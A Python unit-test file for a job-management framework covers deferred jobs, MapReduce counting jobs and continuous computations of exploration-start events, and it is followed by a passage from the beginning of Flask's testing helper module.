# Marker message raised by DummyFailingJobManager and asserted on later.
JOB_FAILED_MESSAGE = 'failed (as expected)'
class DummyJobManager(jobs.BaseDeferredJobManager):
    """Minimal deferred job used throughout these tests; always succeeds."""

    @classmethod
    def _run(cls):
        # The literal return value is asserted on by the tests below.
        return 'output'
class AnotherDummyJobManager(jobs.BaseDeferredJobManager):
    """Second dummy job type, used to test isolation between job types."""

    @classmethod
    def _run(cls):
        return 'output'
class DummyFailingJobManager(jobs.BaseDeferredJobManager):
    """Deferred job that always fails with JOB_FAILED_MESSAGE."""

    @classmethod
    def _run(cls):
        raise Exception(JOB_FAILED_MESSAGE)
class JobWithNoRunMethodManager(jobs.BaseDeferredJobManager):
    """Job that deliberately omits _run() to exercise the error path."""
    pass
class JobManagerUnitTests(test_utils.GenericTestBase):
    """Test basic job manager operations.

    Fix applied throughout: the deprecated ``assertEquals`` alias is
    replaced with ``assertEqual`` (same semantics, non-deprecated API).
    """

    def test_create_new(self):
        """Test the creation of a new job."""
        job_id = DummyJobManager.create_new()
        self.assertTrue(job_id.startswith('DummyJob'))
        self.assertEqual(
            DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_NEW)
        self.assertIsNone(DummyJobManager.get_time_queued_msec(job_id))
        self.assertIsNone(DummyJobManager.get_time_started_msec(job_id))
        self.assertIsNone(DummyJobManager.get_time_finished_msec(job_id))
        self.assertIsNone(DummyJobManager.get_metadata(job_id))
        self.assertIsNone(DummyJobManager.get_output(job_id))
        self.assertIsNone(DummyJobManager.get_error(job_id))
        self.assertFalse(DummyJobManager.is_active(job_id))
        self.assertFalse(DummyJobManager.has_finished(job_id))

    def test_enqueue_job(self):
        """Test the enqueueing of a job."""
        job_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job_id)
        self.assertEqual(self.count_jobs_in_taskqueue(), 1)
        self.assertEqual(
            DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_QUEUED)
        self.assertIsNotNone(DummyJobManager.get_time_queued_msec(job_id))
        self.assertIsNone(DummyJobManager.get_output(job_id))

    def test_failure_for_job_enqueued_using_wrong_manager(self):
        job_id = DummyJobManager.create_new()
        with self.assertRaisesRegexp(Exception, 'Invalid job type'):
            AnotherDummyJobManager.enqueue(job_id)

    def test_failure_for_job_with_no_run_method(self):
        job_id = JobWithNoRunMethodManager.create_new()
        JobWithNoRunMethodManager.enqueue(job_id)
        self.assertEqual(self.count_jobs_in_taskqueue(), 1)
        with self.assertRaisesRegexp(Exception, 'NotImplementedError'):
            self.process_and_flush_pending_tasks()

    def test_complete_job(self):
        job_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job_id)
        self.assertEqual(self.count_jobs_in_taskqueue(), 1)
        self.process_and_flush_pending_tasks()

        self.assertEqual(
            DummyJobManager.get_status_code(job_id),
            jobs.STATUS_CODE_COMPLETED)
        # Timestamps must be present and strictly ordered:
        # queued < started < finished.
        time_queued_msec = DummyJobManager.get_time_queued_msec(job_id)
        time_started_msec = DummyJobManager.get_time_started_msec(job_id)
        time_finished_msec = DummyJobManager.get_time_finished_msec(job_id)
        self.assertIsNotNone(time_queued_msec)
        self.assertIsNotNone(time_started_msec)
        self.assertIsNotNone(time_finished_msec)
        self.assertLess(time_queued_msec, time_started_msec)
        self.assertLess(time_started_msec, time_finished_msec)

        metadata = DummyJobManager.get_metadata(job_id)
        output = DummyJobManager.get_output(job_id)
        error = DummyJobManager.get_error(job_id)
        self.assertIsNone(metadata)
        self.assertEqual(output, 'output')
        self.assertIsNone(error)

        self.assertFalse(DummyJobManager.is_active(job_id))
        self.assertTrue(DummyJobManager.has_finished(job_id))

    def test_job_failure(self):
        job_id = DummyFailingJobManager.create_new()
        DummyFailingJobManager.enqueue(job_id)
        self.assertEqual(self.count_jobs_in_taskqueue(), 1)
        with self.assertRaisesRegexp(Exception, 'Task failed'):
            self.process_and_flush_pending_tasks()

        self.assertEqual(
            DummyFailingJobManager.get_status_code(job_id),
            jobs.STATUS_CODE_FAILED)
        time_queued_msec = DummyFailingJobManager.get_time_queued_msec(job_id)
        time_started_msec = DummyFailingJobManager.get_time_started_msec(
            job_id)
        time_finished_msec = DummyFailingJobManager.get_time_finished_msec(
            job_id)
        self.assertIsNotNone(time_queued_msec)
        self.assertIsNotNone(time_started_msec)
        self.assertIsNotNone(time_finished_msec)
        self.assertLess(time_queued_msec, time_started_msec)
        self.assertLess(time_started_msec, time_finished_msec)

        metadata = DummyFailingJobManager.get_metadata(job_id)
        output = DummyFailingJobManager.get_output(job_id)
        error = DummyFailingJobManager.get_error(job_id)
        self.assertIsNone(metadata)
        self.assertIsNone(output)
        self.assertIn(JOB_FAILED_MESSAGE, error)

        self.assertFalse(DummyFailingJobManager.is_active(job_id))
        self.assertTrue(DummyFailingJobManager.has_finished(job_id))

    def test_status_code_transitions(self):
        """Test that invalid status code transitions are caught."""
        job_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job_id)
        DummyJobManager.register_start(job_id)
        DummyJobManager.register_completion(job_id, 'output')

        # Once completed, no further transitions are allowed.
        with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
            DummyJobManager.enqueue(job_id)
        with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
            DummyJobManager.register_completion(job_id, 'output')
        with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
            DummyJobManager.register_failure(job_id, 'error')

    def test_different_jobs_are_independent(self):
        job_id = DummyJobManager.create_new()
        another_job_id = AnotherDummyJobManager.create_new()

        DummyJobManager.enqueue(job_id)
        DummyJobManager.register_start(job_id)
        AnotherDummyJobManager.enqueue(another_job_id)

        self.assertEqual(
            DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_STARTED)
        self.assertEqual(
            AnotherDummyJobManager.get_status_code(another_job_id),
            jobs.STATUS_CODE_QUEUED)

    def test_cannot_instantiate_jobs_from_abstract_base_classes(self):
        with self.assertRaisesRegexp(
                Exception, 'directly create a job using the abstract base'):
            jobs.BaseJobManager.create_new()

    def test_cannot_enqueue_same_job_twice(self):
        job_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job_id)
        with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
            DummyJobManager.enqueue(job_id)

    def test_can_enqueue_two_instances_of_the_same_job(self):
        job_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job_id)
        job_id_2 = DummyJobManager.create_new()
        DummyJobManager.enqueue(job_id_2)

    def test_cancel_kills_queued_job(self):
        job_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job_id)
        self.assertTrue(DummyJobManager.is_active(job_id))
        DummyJobManager.cancel(job_id, 'admin_user_id')

        self.assertFalse(DummyJobManager.is_active(job_id))
        self.assertEqual(
            DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_CANCELED)
        self.assertIsNone(DummyJobManager.get_output(job_id))
        self.assertEqual(
            DummyJobManager.get_error(job_id), 'Canceled by admin_user_id')

    def test_cancel_kills_started_job(self):
        job_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job_id)
        self.assertTrue(DummyJobManager.is_active(job_id))
        DummyJobManager.register_start(job_id)

        # Cancel the job immediately after it has started.
        DummyJobManager.cancel(job_id, 'admin_user_id')

        # The job then finishes.
        with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
            DummyJobManager.register_completion(job_id, 'job_output')

        self.assertFalse(DummyJobManager.is_active(job_id))
        self.assertEqual(
            DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_CANCELED)
        # Note that no results are recorded for this job.
        self.assertIsNone(DummyJobManager.get_output(job_id))
        self.assertEqual(
            DummyJobManager.get_error(job_id), 'Canceled by admin_user_id')

    def test_cancel_does_not_kill_completed_job(self):
        job_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job_id)
        self.assertTrue(DummyJobManager.is_active(job_id))
        # Complete the job.
        self.process_and_flush_pending_tasks()

        self.assertFalse(DummyJobManager.is_active(job_id))
        self.assertEqual(
            DummyJobManager.get_status_code(job_id),
            jobs.STATUS_CODE_COMPLETED)
        # Cancel the job after it has finished.
        with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
            DummyJobManager.cancel(job_id, 'admin_user_id')

        # The job should still have 'completed' status.
        self.assertFalse(DummyJobManager.is_active(job_id))
        self.assertEqual(
            DummyJobManager.get_status_code(job_id),
            jobs.STATUS_CODE_COMPLETED)
        self.assertEqual(DummyJobManager.get_output(job_id), 'output')
        self.assertIsNone(DummyJobManager.get_error(job_id))

    def test_cancel_does_not_kill_failed_job(self):
        job_id = DummyFailingJobManager.create_new()
        DummyFailingJobManager.enqueue(job_id)
        self.assertTrue(DummyFailingJobManager.is_active(job_id))
        with self.assertRaisesRegexp(Exception, 'Task failed'):
            self.process_and_flush_pending_tasks()

        self.assertFalse(DummyFailingJobManager.is_active(job_id))
        self.assertEqual(
            DummyFailingJobManager.get_status_code(job_id),
            jobs.STATUS_CODE_FAILED)
        # Cancel the job after it has finished.
        with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
            DummyFailingJobManager.cancel(job_id, 'admin_user_id')

        # The job should still have 'failed' status.
        self.assertFalse(DummyFailingJobManager.is_active(job_id))
        self.assertEqual(
            DummyFailingJobManager.get_status_code(job_id),
            jobs.STATUS_CODE_FAILED)
        self.assertIsNone(DummyFailingJobManager.get_output(job_id))
        self.assertIn(
            'raise Exception', DummyFailingJobManager.get_error(job_id))

    def test_cancelling_multiple_unfinished_jobs(self):
        job1_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job1_id)
        job2_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job2_id)

        DummyJobManager.register_start(job1_id)
        DummyJobManager.register_start(job2_id)
        DummyJobManager.cancel_all_unfinished_jobs('admin_user_id')

        self.assertFalse(DummyJobManager.is_active(job1_id))
        self.assertFalse(DummyJobManager.is_active(job2_id))
        self.assertEqual(
            DummyJobManager.get_status_code(job1_id),
            jobs.STATUS_CODE_CANCELED)
        self.assertEqual(
            DummyJobManager.get_status_code(job2_id),
            jobs.STATUS_CODE_CANCELED)
        self.assertIsNone(DummyJobManager.get_output(job1_id))
        self.assertIsNone(DummyJobManager.get_output(job2_id))
        self.assertEqual(
            'Canceled by admin_user_id', DummyJobManager.get_error(job1_id))
        self.assertEqual(
            'Canceled by admin_user_id', DummyJobManager.get_error(job2_id))

    def test_cancelling_one_unfinished_job(self):
        job1_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job1_id)
        job2_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job2_id)

        DummyJobManager.register_start(job1_id)
        DummyJobManager.register_start(job2_id)
        DummyJobManager.cancel(job1_id, 'admin_user_id')

        with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
            self.process_and_flush_pending_tasks()
        DummyJobManager.register_completion(job2_id, 'output')

        self.assertFalse(DummyJobManager.is_active(job1_id))
        self.assertFalse(DummyJobManager.is_active(job2_id))
        self.assertEqual(
            DummyJobManager.get_status_code(job1_id),
            jobs.STATUS_CODE_CANCELED)
        self.assertEqual(
            DummyJobManager.get_status_code(job2_id),
            jobs.STATUS_CODE_COMPLETED)
        self.assertIsNone(DummyJobManager.get_output(job1_id))
        self.assertEqual(DummyJobManager.get_output(job2_id), 'output')
        self.assertEqual(
            'Canceled by admin_user_id', DummyJobManager.get_error(job1_id))
        self.assertIsNone(DummyJobManager.get_error(job2_id))
# Shared fixtures for the datastore-backed job tests below.
# NOTE(review): TEST_INPUT_DATA is not referenced anywhere in this chunk --
# confirm whether it is used further down or is dead.
TEST_INPUT_DATA = [(1, 2), (3, 4), (1, 5)]
# Id of the single SumModel entity that the addition jobs write to.
SUM_MODEL_ID = 'all_data_id'
class NumbersModel(ndb.Model):
    """Datastore entity holding one integer; summed by the addition jobs."""
    number = ndb.IntegerProperty()
class SumModel(ndb.Model):
    """Datastore entity holding the result written by the addition jobs."""
    total = ndb.IntegerProperty(default=0)
    # Set to True by FailingAdditionJobManager's post-failure hook.
    failed = ndb.BooleanProperty(default=False)
class TestDeferredJobManager(jobs.BaseDeferredJobManager):
    """Base class for testing deferred jobs."""
    pass
class TestAdditionJobManager(TestDeferredJobManager):
    """Deferred job that sums every NumbersModel value.

    The result is stored in a SumModel entity with id SUM_MODEL_ID.
    """

    @classmethod
    def _run(cls):
        grand_total = sum(
            entity.number for entity in NumbersModel.query())
        SumModel(id=SUM_MODEL_ID, total=grand_total).put()
class FailingAdditionJobManager(TestDeferredJobManager):
    """Deferred job that records a sum in SumModel and then raises."""

    IS_VALID_JOB_CLASS = True

    @classmethod
    def _run(cls):
        running_total = sum(
            entity.number for entity in NumbersModel.query())
        SumModel(id=SUM_MODEL_ID, total=running_total).put()
        raise Exception('Oops, I failed.')

    @classmethod
    def _post_failure_hook(cls, job_id):
        # Flag the sum entity so tests can verify this hook ran.
        failed_model = SumModel.get_by_id(SUM_MODEL_ID)
        failed_model.failed = True
        failed_model.put()
class DatastoreJobIntegrationTests(test_utils.GenericTestBase):
    """Tests the behavior of a job that affects data in the datastore.

    This job gets all NumbersModel instances and sums their values, and puts
    the summed values in a SumModel instance with id SUM_MODEL_ID. The
    computation is redone from scratch each time the job is run.
    """

    def _get_stored_total(self):
        """Return the stored sum, or 0 if no SumModel entity exists yet."""
        sum_model = SumModel.get_by_id(SUM_MODEL_ID)
        return sum_model.total if sum_model else 0

    def _populate_data(self):
        """Populate the datastore with four NumbersModel instances."""
        NumbersModel(number=1).put()
        NumbersModel(number=2).put()
        NumbersModel(number=1).put()
        NumbersModel(number=2).put()

    def test_sequential_jobs(self):
        self._populate_data()
        self.assertEqual(self._get_stored_total(), 0)

        TestAdditionJobManager.enqueue(
            TestAdditionJobManager.create_new())
        self.assertEqual(self.count_jobs_in_taskqueue(), 1)
        self.process_and_flush_pending_tasks()
        self.assertEqual(self._get_stored_total(), 6)

        NumbersModel(number=3).put()

        TestAdditionJobManager.enqueue(
            TestAdditionJobManager.create_new())
        self.assertEqual(self.count_jobs_in_taskqueue(), 1)
        self.process_and_flush_pending_tasks()
        self.assertEqual(self._get_stored_total(), 9)

    def test_multiple_enqueued_jobs(self):
        self._populate_data()

        TestAdditionJobManager.enqueue(
            TestAdditionJobManager.create_new())
        NumbersModel(number=3).put()
        TestAdditionJobManager.enqueue(
            TestAdditionJobManager.create_new())

        self.assertEqual(self.count_jobs_in_taskqueue(), 2)
        self.process_and_flush_pending_tasks()
        self.assertEqual(self._get_stored_total(), 9)

    def test_failing_job(self):
        self._populate_data()
        job_id = FailingAdditionJobManager.create_new()
        FailingAdditionJobManager.enqueue(job_id)

        self.assertEqual(self.count_jobs_in_taskqueue(), 1)
        with self.assertRaisesRegexp(
                taskqueue_services.PermanentTaskFailure, 'Oops, I failed'):
            self.process_and_flush_pending_tasks()
        # The work that the failing job did before it failed is still done.
        self.assertEqual(self._get_stored_total(), 6)

        # The post-failure hook should have run.
        self.assertTrue(SumModel.get_by_id(SUM_MODEL_ID).failed)

        # BUG FIX: this was assertTrue(actual, expected), which never
        # compares -- assertTrue's second argument is only a failure
        # message. Use assertEqual so the status is actually checked.
        self.assertEqual(
            FailingAdditionJobManager.get_status_code(job_id),
            jobs.STATUS_CODE_FAILED)
class SampleMapReduceJobManager(jobs.BaseMapReduceJobManager):
    """Test job that counts the total number of explorations."""

    @classmethod
    def entity_classes_to_map_over(cls):
        return [exp_models.ExplorationModel]

    @staticmethod
    def map(item):
        # Every exploration contributes one unit under the 'sum' key.
        yield ('sum', 1)

    @staticmethod
    def reduce(key, values):
        yield (key, sum(int(v) for v in values))
class MapReduceJobIntegrationTests(test_utils.GenericTestBase):
    """Tests MapReduce jobs end-to-end."""

    def setUp(self):
        """Create an exploration so that there is something to count."""
        super(MapReduceJobIntegrationTests, self).setUp()
        exploration = exp_domain.Exploration.create_default_exploration(
            'exp_id', 'title', 'A category')
        exp_services.save_new_exploration('owner_id', exploration)
        self.process_and_flush_pending_tasks()

    def test_count_all_explorations(self):
        job_id = SampleMapReduceJobManager.create_new()
        SampleMapReduceJobManager.enqueue(job_id)
        self.assertEqual(self.count_jobs_in_taskqueue(), 1)
        self.process_and_flush_pending_tasks()

        # One exploration exists, so the reduce output is [['sum', 1]].
        self.assertEqual(
            SampleMapReduceJobManager.get_output(job_id), [['sum', 1]])
        self.assertEqual(
            SampleMapReduceJobManager.get_status_code(job_id),
            jobs.STATUS_CODE_COMPLETED)
class JobRegistryTests(test_utils.GenericTestBase):
    """Tests job registry."""

    def test_each_one_off_class_is_subclass_of_BaseJobManager(self):
        for klass in jobs_registry.ONE_OFF_JOB_MANAGERS:
            self.assertTrue(issubclass(klass, jobs.BaseJobManager))

    def test_each_one_off_class_is_not_abstract(self):
        for klass in jobs_registry.ONE_OFF_JOB_MANAGERS:
            # Deliberately reaches into the private _is_abstract() helper.
            self.assertFalse(klass._is_abstract())

    def test_validity_of_each_continuous_computation_class(self):
        for klass in jobs_registry.ALL_CONTINUOUS_COMPUTATION_MANAGERS:
            self.assertTrue(
                issubclass(klass, jobs.BaseContinuousComputationManager))

            event_types_listened_to = klass.get_event_types_listened_to()
            self.assertTrue(isinstance(event_types_listened_to, list))
            for event_type in event_types_listened_to:
                # basestring: this file is Python 2.
                self.assertTrue(isinstance(event_type, basestring))
                self.assertTrue(issubclass(
                    event_services.Registry.get_event_class_by_type(
                        event_type),
                    event_services.BaseEventHandler))

            rdc = klass._get_realtime_datastore_class()
            self.assertTrue(issubclass(
                rdc, jobs.BaseRealtimeDatastoreClassForContinuousComputations))

            # The list of allowed base classes. This can be extended as the
            # need arises, though we may also want to implement
            # _get_continuous_computation_class() and
            # _entity_created_before_job_queued() for other base classes
            # that are added to this list.
            ALLOWED_BASE_BATCH_JOB_CLASSES = [
                jobs.BaseMapReduceJobManagerForContinuousComputations]
            self.assertTrue(any([
                issubclass(klass._get_batch_job_manager_class(), superclass)
                for superclass in ALLOWED_BASE_BATCH_JOB_CLASSES]))
class JobQueriesTests(test_utils.GenericTestBase):
    """Tests queries for jobs."""

    def test_get_data_for_recent_jobs(self):
        self.assertEqual(jobs.get_data_for_recent_jobs(), [])

        job_id = DummyJobManager.create_new()
        DummyJobManager.enqueue(job_id)
        recent_jobs = jobs.get_data_for_recent_jobs()
        self.assertEqual(len(recent_jobs), 1)
        # assertDictContainsSubset is deprecated in newer unittest versions;
        # acceptable here since this codebase targets Python 2.
        self.assertDictContainsSubset({
            'id': job_id,
            'status_code': jobs.STATUS_CODE_QUEUED,
            'job_type': 'DummyJobManager',
            'is_cancelable': True,
            'error': None
        }, recent_jobs[0])
class TwoClassesMapReduceJobManager(jobs.BaseMapReduceJobManager):
    """A test job handler that counts entities in two datastore classes."""

    @classmethod
    def entity_classes_to_map_over(cls):
        return [exp_models.ExplorationModel, exp_models.ExplorationRightsModel]

    @staticmethod
    def map(item):
        # Each mapped entity, regardless of class, counts once.
        yield ('sum', 1)

    @staticmethod
    def reduce(key, values):
        yield (key, sum(int(v) for v in values))
class TwoClassesMapReduceJobIntegrationTests(test_utils.GenericTestBase):
    """Tests MapReduce jobs using two classes end-to-end."""

    def setUp(self):
        """Create an exploration so that there is something to count."""
        super(TwoClassesMapReduceJobIntegrationTests, self).setUp()
        exploration = exp_domain.Exploration.create_default_exploration(
            'exp_id', 'title', 'A category')
        # Note that this ends up creating an entry in the
        # ExplorationRightsModel as well.
        exp_services.save_new_exploration('owner_id', exploration)
        self.process_and_flush_pending_tasks()

    def test_count_entities(self):
        self.assertEqual(exp_models.ExplorationModel.query().count(), 1)
        self.assertEqual(exp_models.ExplorationRightsModel.query().count(), 1)

        job_id = TwoClassesMapReduceJobManager.create_new()
        TwoClassesMapReduceJobManager.enqueue(job_id)
        self.assertEqual(self.count_jobs_in_taskqueue(), 1)
        self.process_and_flush_pending_tasks()

        # One entity of each class => total of 2.
        self.assertEqual(
            TwoClassesMapReduceJobManager.get_output(job_id), [['sum', 2]])
        self.assertEqual(
            TwoClassesMapReduceJobManager.get_status_code(job_id),
            jobs.STATUS_CODE_COMPLETED)
class StartExplorationRealtimeModel(
        jobs.BaseRealtimeDatastoreClassForContinuousComputations):
    """Realtime-layer entity counting 'start exploration' events."""
    count = ndb.IntegerProperty(default=0)
class StartExplorationMRJobManager(
        jobs.BaseMapReduceJobManagerForContinuousComputations):
    """Batch half of StartExplorationEventCounter: aggregates start events."""

    @classmethod
    def _get_continuous_computation_class(cls):
        return StartExplorationEventCounter

    @classmethod
    def entity_classes_to_map_over(cls):
        return [stats_models.StartExplorationEventLogEntryModel]

    @staticmethod
    def map(item):
        # Only count events logged before this batch job was queued; newer
        # events are covered by the realtime layer.
        current_class = StartExplorationMRJobManager
        if current_class._entity_created_before_job_queued(item):
            yield (item.exploration_id, {
                'event_type': item.event_type,
            })

    @staticmethod
    def reduce(key, stringified_values):
        started_count = 0
        for value_str in stringified_values:
            # MapReduce passes values as strings; decode the dict literal.
            value = ast.literal_eval(value_str)
            if value['event_type'] == feconf.EVENT_TYPE_START_EXPLORATION:
                started_count += 1
        stats_models.ExplorationAnnotationsModel(
            id=key, num_starts=started_count).put()
class StartExplorationEventCounter(jobs.BaseContinuousComputationManager):
    """A continuous-computation job that counts 'start exploration' events.

    This class should only be used in tests.
    """

    @classmethod
    def get_event_types_listened_to(cls):
        return [feconf.EVENT_TYPE_START_EXPLORATION]

    @classmethod
    def _get_realtime_datastore_class(cls):
        return StartExplorationRealtimeModel

    @classmethod
    def _get_batch_job_manager_class(cls):
        return StartExplorationMRJobManager

    @classmethod
    def _kickoff_batch_job_after_previous_one_ends(cls):
        """Override this method so that it does not immediately start a
        new MapReduce job. Non-test subclasses should not do this."""
        pass

    @classmethod
    def _handle_incoming_event(
            cls, active_realtime_layer, event_type, exp_id, exp_version,
            state_name, session_id, params, play_type):
        """Increment the per-exploration counter in the active realtime layer."""

        def _increment_counter():
            # Create the realtime entity on first event, else increment it.
            realtime_class = cls._get_realtime_datastore_class()
            realtime_model_id = realtime_class.get_realtime_id(
                active_realtime_layer, exp_id)

            realtime_model = realtime_class.get(
                realtime_model_id, strict=False)
            if realtime_model is None:
                realtime_class(
                    id=realtime_model_id, count=1,
                    realtime_layer=active_realtime_layer).put()
            else:
                realtime_model.count += 1
                realtime_model.put()

        # Run inside a transaction to avoid lost updates on the counter.
        transaction_services.run_in_transaction(_increment_counter)

    # Public query method.
    @classmethod
    def get_count(cls, exploration_id):
        """Return the number of 'start exploration' events received.

        Answers the query by combining the existing MR job output and the
        active realtime_datastore_class.
        """
        mr_model = stats_models.ExplorationAnnotationsModel.get(
            exploration_id, strict=False)
        realtime_model = cls._get_realtime_datastore_class().get(
            cls.get_active_realtime_layer_id(exploration_id), strict=False)

        answer = 0
        if mr_model is not None:
            answer += mr_model.num_starts
        if realtime_model is not None:
            answer += realtime_model.count
        return answer
class ContinuousComputationTests(test_utils.GenericTestBase):
    """Tests continuous computations for 'start exploration' events."""

    EXP_ID = 'exp_id'

    # Swapped in for the production registry so only the test computation runs.
    ALL_CONTINUOUS_COMPUTATION_MANAGERS_FOR_TESTS = [
        StartExplorationEventCounter]

    def setUp(self):
        """Create an exploration and register the event listener manually."""
        super(ContinuousComputationTests, self).setUp()
        exploration = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'title', 'A category')
        exp_services.save_new_exploration('owner_id', exploration)
        # Drain any tasks queued by exploration creation so each test starts
        # with an empty task queue.
        self.process_and_flush_pending_tasks()

    def test_continuous_computation_workflow(self):
        """An integration test for continuous computations."""
        with self.swap(
                jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
                self.ALL_CONTINUOUS_COMPUTATION_MANAGERS_FOR_TESTS):
            self.assertEqual(
                StartExplorationEventCounter.get_count(self.EXP_ID), 0)

            # Record an event. This will put the event in the task queue.
            event_services.StartExplorationEventHandler.record(
                self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id',
                {}, feconf.PLAY_TYPE_NORMAL)
            # Not yet visible: the event is still sitting in the task queue.
            self.assertEqual(
                StartExplorationEventCounter.get_count(self.EXP_ID), 0)
            self.assertEqual(self.count_jobs_in_taskqueue(), 1)

            # When the task queue is flushed, the data is recorded in the two
            # realtime layers.
            self.process_and_flush_pending_tasks()
            self.assertEqual(self.count_jobs_in_taskqueue(), 0)
            self.assertEqual(
                StartExplorationEventCounter.get_count(self.EXP_ID), 1)
            self.assertEqual(StartExplorationRealtimeModel.get(
                '0:%s' % self.EXP_ID).count, 1)
            self.assertEqual(StartExplorationRealtimeModel.get(
                '1:%s' % self.EXP_ID).count, 1)

            # The batch job has not run yet, so no entity for self.EXP_ID will
            # have been created in the batch model yet.
            with self.assertRaises(base_models.BaseModel.EntityNotFoundError):
                stats_models.ExplorationAnnotationsModel.get(self.EXP_ID)

            # Launch the batch computation.
            StartExplorationEventCounter.start_computation()
            # Data in realtime layer 0 is still there.
            self.assertEqual(StartExplorationRealtimeModel.get(
                '0:%s' % self.EXP_ID).count, 1)
            # Data in realtime layer 1 has been deleted.
            self.assertIsNone(StartExplorationRealtimeModel.get(
                '1:%s' % self.EXP_ID, strict=False))

            # Flushing the queue runs the MapReduce job to completion.
            self.assertEqual(self.count_jobs_in_taskqueue(), 1)
            self.process_and_flush_pending_tasks()
            self.assertEqual(
                stats_models.ExplorationAnnotationsModel.get(
                    self.EXP_ID).num_starts, 1)

            # The overall count is still 1.
            self.assertEqual(
                StartExplorationEventCounter.get_count(self.EXP_ID), 1)
            # Data in realtime layer 0 has been deleted.
            self.assertIsNone(StartExplorationRealtimeModel.get(
                '0:%s' % self.EXP_ID, strict=False))
            # Data in realtime layer 1 has been deleted.
            self.assertIsNone(StartExplorationRealtimeModel.get(
                '1:%s' % self.EXP_ID, strict=False))

    def test_events_coming_in_while_batch_job_is_running(self):
        with self.swap(
                jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
                self.ALL_CONTINUOUS_COMPUTATION_MANAGERS_FOR_TESTS):
            # Currently no events have been recorded.
            self.assertEqual(
                StartExplorationEventCounter.get_count(self.EXP_ID), 0)

            # Enqueue the batch computation. (It is running on 0 events.)
            StartExplorationEventCounter._kickoff_batch_job()

            # Record an event while this job is in the queue. Simulate
            # this by directly calling on_incoming_event(), because using
            # StartExplorationEventHandler.record() would just put the event
            # in the task queue, which we don't want to flush yet.
            event_services.StartExplorationEventHandler._handle_event(
                self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id',
                {}, feconf.PLAY_TYPE_NORMAL)
            StartExplorationEventCounter.on_incoming_event(
                event_services.StartExplorationEventHandler.EVENT_TYPE,
                self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id',
                {}, feconf.PLAY_TYPE_NORMAL)

            # The overall count is now 1 (served from the realtime layer).
            self.assertEqual(
                StartExplorationEventCounter.get_count(self.EXP_ID), 1)

            # Finish the job.
            self.process_and_flush_pending_tasks()

            # When the batch job completes, the overall count is still 1.
            self.assertEqual(
                StartExplorationEventCounter.get_count(self.EXP_ID), 1)
            # The batch job result should still be 0, since the event arrived
            # after the batch job started.
            with self.assertRaises(base_models.BaseModel.EntityNotFoundError):
                stats_models.ExplorationAnnotationsModel.get(self.EXP_ID)
# TODO(sll): When we have some concrete ContinuousComputations running in
# production, add an integration test to ensure that the registration of event
# handlers in the main codebase is happening correctly.
|
pambot/SMSBeds
|
refs/heads/master
|
lib/flask/testing.py
|
783
|
# -*- coding: utf-8 -*-
"""
flask.testing
~~~~~~~~~~~~~
Implements test support helpers. This module is lazily imported
and usually not used in production environments.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from contextlib import contextmanager
from werkzeug.test import Client, EnvironBuilder
from flask import _request_ctx_stack
try:
from werkzeug.urls import url_parse
except ImportError:
from urlparse import urlsplit as url_parse
def make_test_environ_builder(app, path='/', base_url=None, *args, **kwargs):
    """Creates a new test builder with some application defaults thrown in.

    If *base_url* is not given it is derived from *path*: an absolute URL
    (with a netloc) supplies the host, otherwise the app's ``SERVER_NAME``
    (or ``localhost``) is used, with ``APPLICATION_ROOT`` appended.

    Args:
        app: the Flask application whose config supplies the defaults.
        path: the request path, optionally a full URL.
        base_url: explicit base URL; overrides derivation from *path*.

    Returns:
        a :class:`werkzeug.test.EnvironBuilder` for the request.
    """
    http_host = app.config.get('SERVER_NAME')
    app_root = app.config.get('APPLICATION_ROOT')
    if base_url is None:
        url = url_parse(path)
        base_url = 'http://%s/' % (url.netloc or http_host or 'localhost')
        if app_root:
            base_url += app_root.lstrip('/')
        if url.netloc:
            # Bug fix: previously only url.path was kept here, silently
            # dropping any query string passed as part of a full URL.
            path = url.path
            if url.query:
                path += '?' + url.query
    return EnvironBuilder(path, base_url, *args, **kwargs)
class FlaskClient(Client):
    """Works like a regular Werkzeug test client but has some knowledge about
    how Flask works to defer the cleanup of the request context stack to the
    end of a with body when used in a with statement. For general information
    about how to use this class refer to :class:`werkzeug.test.Client`.
    Basic usage is outlined in the :ref:`testing` chapter.
    """

    # When True, the request context of the last request is kept alive until
    # the enclosing `with client:` block exits (toggled by __enter__/__exit__).
    preserve_context = False

    @contextmanager
    def session_transaction(self, *args, **kwargs):
        """When used in combination with a with statement this opens a
        session transaction. This can be used to modify the session that
        the test client uses. Once the with block is left the session is
        stored back.

            with client.session_transaction() as session:
                session['value'] = 42

        Internally this is implemented by going through a temporary test
        request context and since session handling could depend on
        request variables this function accepts the same arguments as
        :meth:`~flask.Flask.test_request_context` which are directly
        passed through.
        """
        if self.cookie_jar is None:
            raise RuntimeError('Session transactions only make sense '
                               'with cookies enabled.')
        app = self.application
        # Replay the client's cookies into the WSGI environ so the opened
        # session matches what a real request from this client would see.
        environ_overrides = kwargs.setdefault('environ_overrides', {})
